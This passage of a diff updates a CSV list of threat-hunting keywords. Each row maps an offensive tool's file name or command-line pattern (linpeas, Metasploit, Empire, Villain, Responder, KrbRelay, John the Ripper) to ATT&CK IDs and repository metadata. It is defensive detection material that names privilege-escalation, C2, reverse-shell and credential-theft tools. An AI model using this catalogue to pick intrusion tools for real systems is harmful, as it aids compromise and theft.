tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_darwin_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_darwin_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_darwin_arm64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_darwin_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*linpeas_fat.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_darwin_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*linpeas_fat.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_linux_386*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_linux_386*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_linux_386*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_linux_amd64*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_linux_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_linux_amd64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linpeas_linux_arm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linpeas_linux_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*linpeas_linux_arm64*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*linux_hostrecon*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*linux_hostrecon.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*Linux_LPE_eBPF_CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Linux_LPE_eBPF_CVE*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*linux_sudo_cve-2017-1000367.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*linux_trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*LinuxARMLELF32.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*linux_trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*LinuxARMLELF32.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*linux-exploit-suggester*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*linux-exploit-suggester*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*linux-exploit-suggester.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*linuxprivchecker*","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","N/A","N/A","10","1344","483","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z" -"*linuxprivchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*linuxprivchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*linux-rds-exploit.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*linux-smart-enumeration.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*linux-smart-enumeration-master*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*linWinPwn-*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*linWinPwn.*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*lion2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*lion2john-alt.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*linux-smart-enumeration-master*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*linWinPwn-*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*linWinPwn.*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lion2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*lion2john-alt.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*LiquidSnake.exe*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" -"*list_backdoors*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*list_backdoors*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*List_Privileges /Process:powershell*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*list_tcppivot*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*list_tokens -u*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" @@ -13152,7 +13309,7 @@ "*ListDomainGroupsLocalAdmin*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*listen(58082* '0.0.0.0'*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" "*listen_http 0.0.0.0 8080 *.php operation1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" -"*ListMetasploitPayloads*","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ListMetasploitPayloads*","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ListNeverLoggedInAccounts*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListPasswordNeverExpire*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListUsersLastPasswordChange*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" @@ -13167,8 +13324,8 @@ "*lkarlslund/Adalanche*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*llehsrewop*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed powershell","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-llmnr -spn '*cifs* -secrets*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"*LLMNR.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*LLMNRSpoofer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools 